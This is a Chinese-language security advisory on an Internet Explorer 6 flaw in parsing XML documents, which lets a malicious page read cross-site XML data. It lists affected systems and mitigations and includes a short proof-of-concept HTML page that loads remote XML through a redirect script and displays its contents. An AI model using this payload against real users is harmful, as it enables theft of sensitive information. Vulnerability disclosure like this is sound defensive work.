Microsoft Internet Explorer远程任意XML文档解析漏洞
受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows 2000
描述:
--------------------------------------------------------------------------------
Microsoft Internet Explorer是一款流行的WEB浏览器。
Microsoft Internet Explorer不正确处理畸形XML文档,远程攻击者可以利用这个漏洞获得用户敏感信息。
Georgi Guninski报告远程用户可以建立某个恶意HTML代码,当目标用户装载的时候,会从任意服务器中获取XML数据,并转发目标用户机器上的信息到远程用户。
攻击者可以通过JavaScript装载目标XML文档,然后'xml'脚本调用远程机器上的重定向脚本重定向当前问档到目标站点上。导致敏感信息泄露。
<*来源:Georgi Guninski (guninski@guninski.com)
链接:http://www.guninski.com/where_do_you_want_billg_to_go_today_1.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski (guninski@guninski.com)提供了如下测试方法:
---------
<html>
<script>
function f()
{
alert(document.all.x1.XMLDocument.xml);
}
</script>
<body onload="f()">
<script id="x1" language="xml" src="/cgi-bin/redir.pl"></script>
<h1>
Copyright Georgi Guninski <br />
Cannot be used in any database
</h1>
</body>
</html>
---------
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 关闭IE脚本执行功能。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp